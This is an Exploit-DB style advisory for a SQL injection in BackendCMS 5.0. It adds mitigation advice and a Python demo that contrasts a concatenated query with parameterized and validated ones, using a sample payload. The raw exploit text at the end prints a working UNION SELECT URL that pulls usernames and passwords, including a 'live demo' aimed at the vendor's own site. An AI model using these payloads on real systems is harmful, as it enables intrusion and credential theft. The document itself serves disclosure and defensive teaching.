Vendor: BackendCMS Version 5.0
By: AnGeL25dZ
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: BackendCMS Version 5.0
Affected Version From: 5
Affected Version To: 5
Patch Exists: YES
Related CWE: N/A
CPE: a:backendcms:backendcms:5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

BackendCMS Version 5.0 SQL Injection

The id parameter of main.asp is passed into a database query without validation or parameterization. An attacker who appends SQL to that parameter in the HTTP request can therefore alter the query, read from the application database and obtain sensitive information such as the stored user names and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It should be applied on both the client side and the server side, but only the server-side check counts as a security control, since client-side validation can be bypassed by sending the request directly. Parameterized queries (prepared statements) are the primary defense: the parameter value is passed to the database separately from the SQL text, so it can never change the structure of the query.
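The following added example, which is not part of this entry nor of the BackendCMS product, shows the two mitigations side by side in Python with an in-memory SQLite database standing in for the classic ASP application. The pages table, the sample rows and the three-column test payload are constructed for the example; the user table only borrows the column names brugernavn and password that the advisory mentions. The string-concatenating lookup reproduces the defect class so that the effect of the hardened lookup can be checked against it.

```python
import re
import sqlite3

# Constructed sample data: the column names brugernavn/password follow the
# advisory, the rows and the "pages" table are made up for this example.
SAMPLE_USERS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]
SAMPLE_PAGES = [(1, "Welcome", "Front page text"), (2, "About", "About the site")]

# Constructed payload adapted to the three-column "pages" table of this example.
# It is only used here to show what each lookup does with hostile input.
TEST_PAYLOAD = "-1 union all select brugernavn, password, 3 from user"

# Allow-list for the id parameter: a short decimal integer and nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,9}")


def make_db():
    """Build the in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, brugernavn TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_PAGES)
    return conn


def lookup_page_vulnerable(conn, raw_id):
    """Defect class from the advisory: request parameter concatenated into SQL."""
    sql = "SELECT id, title, body FROM pages WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_page_parameterized(conn, raw_id):
    """Parameterized query only: the value travels separately from the SQL text,
    so SQL inside it is compared as data and cannot change the query."""
    return conn.execute(
        "SELECT id, title, body FROM pages WHERE id=?", (raw_id,)
    ).fetchall()


def validate_id(raw_id):
    """Server-side allow-list check; raises ValueError for anything but digits."""
    if not ID_PATTERN.fullmatch(raw_id):
        raise ValueError("invalid id parameter")
    return int(raw_id)


def lookup_page_hardened(conn, raw_id):
    """Both layers: validate the parameter, then bind it in a prepared statement."""
    page_id = validate_id(raw_id)
    return lookup_page_parameterized(conn, page_id)


def rejects(conn, raw_id):
    """True if the hardened lookup refuses the input before it reaches SQL."""
    try:
        lookup_page_hardened(conn, raw_id)
    except ValueError:
        return True
    return False


def run_demo():
    """Return what each lookup does with a valid id and with the test payload."""
    conn = make_db()
    return {
        "valid": lookup_page_hardened(conn, "1"),
        "vulnerable_leak": lookup_page_vulnerable(conn, TEST_PAYLOAD),
        "parameterized_only": lookup_page_parameterized(conn, TEST_PAYLOAD),
        "hardened_rejects": rejects(conn, TEST_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

The concatenating lookup returns the user table's credentials in place of page rows, the parameterized lookup returns nothing because the whole string is compared as a value against the integer column, and the hardened lookup never reaches the database at all. Keeping both layers is deliberate: validation gives an early, loggable rejection, while the prepared statement protects every query path, including those a validator was never written for.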

Exploit-DB raw data:

************************************************************
** 	BackendCMS Version 5.0 SQL Injection
************************************************************
**  Product:		BackendCMS Version 5.0  
**  Home   : 		http://www.backendcms.dk/
**  Vulnerability :	SQL Injection 
**  Dork : 		find it yourself
**			
************************************************************
** Discovered by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of HackTeach
**		 All Members of http://islam-attack.com
**		 ra3ch and all my friends ...MOC 
** 		 
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
**  
** Administration Login : http://[path]/admin/
** PS: the number of columns can be different from one site to another
**  
****************************************************************
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user

# milw0rm.com [2009-04-09]